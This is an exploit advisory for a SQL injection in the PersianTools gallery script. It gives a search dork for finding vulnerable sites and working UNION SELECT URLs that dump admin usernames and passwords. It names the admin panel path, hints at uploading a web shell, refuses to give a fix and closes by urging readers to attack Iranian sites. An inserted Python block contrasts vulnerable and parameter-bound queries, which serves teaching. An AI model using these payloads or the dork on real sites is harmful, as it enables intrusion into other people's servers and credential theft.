Persian Tools Gallery suffers from a remote SQL injection vulnerability.
=If you are muslim you will NEVER walk alone because ALLAH will be with you=
>>> Author: Sakab
>>> My email: Sakab12345@hotmail.com
>>> My Sites: www.iq-ty.com & www.tryag.com
>>> Date: 9/10/1429 >>> Islamic calendar :P
>>> Script: PersianTools gallery
>>> Dork: inurl:"gallery.php?catid="
>>> Type: Remote SQL Injection Vulnerability
>>> Note: if you log in as an admin you may upload a shell from the control panel
do not ask how !! use your mind ;)
>>> Exploit:
http://www.iq-ty.com/gallery.php?catid=[SQL]
>>> Examples:
http://www.iq-ty.com/gallery.php?catid=-24 union all select 1,username,password,4,5,6 from user--
http://www.iq-ty.com/gallery.php?catid=-24 union all select 1,concat(database(),char(58),user()),3,4,5,6 from user--
>>> Control panel path: http://www.iq-ty.com/admin/index.php
>>> Solution: I will never give it to you :P
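The example requests above are consistent with the `catid` value being placed directly into the SQL text. The following is an added example, not code from the advisory or from PersianTools: it shows a concatenated query beside an allow-listed, parameter-bound one, fed with the first example request's value. Python with in-memory SQLite stands in for the PHP/MySQL script; the schema, rows and function names are constructed assumptions.

```python
import sqlite3

COLUMNS = "id, title, file, catid, views, added"  # assumed six-column listing


def build_db():
    """Constructed sample data; the real PersianTools schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gallery (id INTEGER, title TEXT, file TEXT,
                              catid INTEGER, views INTEGER, added TEXT);
        CREATE TABLE user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO gallery VALUES (1, 'Sunset', 'sunset.jpg', 24, 10, '2008-10-01');
        INSERT INTO user VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def list_category_vulnerable(db, catid):
    # Request text is pasted into the SQL, so it can rewrite the statement.
    sql = f"SELECT {COLUMNS} FROM gallery WHERE catid={catid}"
    return db.execute(sql).fetchall()


def list_category_hardened(db, catid):
    # 1. Allow-list: a category id is a short run of ASCII digits only.
    if not (catid.isascii() and catid.isdigit() and len(catid) <= 9):
        raise ValueError("catid must be a non-negative integer")
    # 2. Bound parameter: the value is sent apart from the SQL text.
    sql = f"SELECT {COLUMNS} FROM gallery WHERE catid = ?"
    return db.execute(sql, (int(catid),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # First example request from the advisory, query-string value only.
    payload = "-24 union all select 1,username,password,4,5,6 from user--"
    print(list_category_vulnerable(db, payload))   # rows from `user`
    try:
        list_category_hardened(db, payload)
    except ValueError as exc:
        print("rejected:", exc)
    print(list_category_hardened(db, "24"))        # normal listing
```

In a PHP script the same two steps correspond to an integer check on the request value and a prepared statement (PDO or mysqli) with a bound parameter.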
++++++++++++++++++++++++++++++++
================================
GreeTz >>>>>>>>>>>>>>>>>>>>>>>>>
=======================================
My best friend: Hussain x
All KSA hackers and all Muslim hackers
All members of www.iq-ty.com & www.tryag.com
+++++++++++++++++++++++++++++++++++++++
NOTE: Now you can FUCK Iran sites ...... Can you ?! :)